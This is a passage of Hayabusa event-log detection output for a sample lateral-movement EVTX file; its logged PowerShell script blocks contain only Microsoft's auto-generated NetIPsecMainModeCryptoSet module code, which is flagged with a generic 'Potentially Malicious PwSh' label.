[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = 
@(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_methodParam",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, 
$__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' -Alias '*' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 
$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetNam",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { 
@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } 
Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeCryptoSet' -Alias '*' function Copy-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters 
$__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) 
$__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetNam",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.611 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"e )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 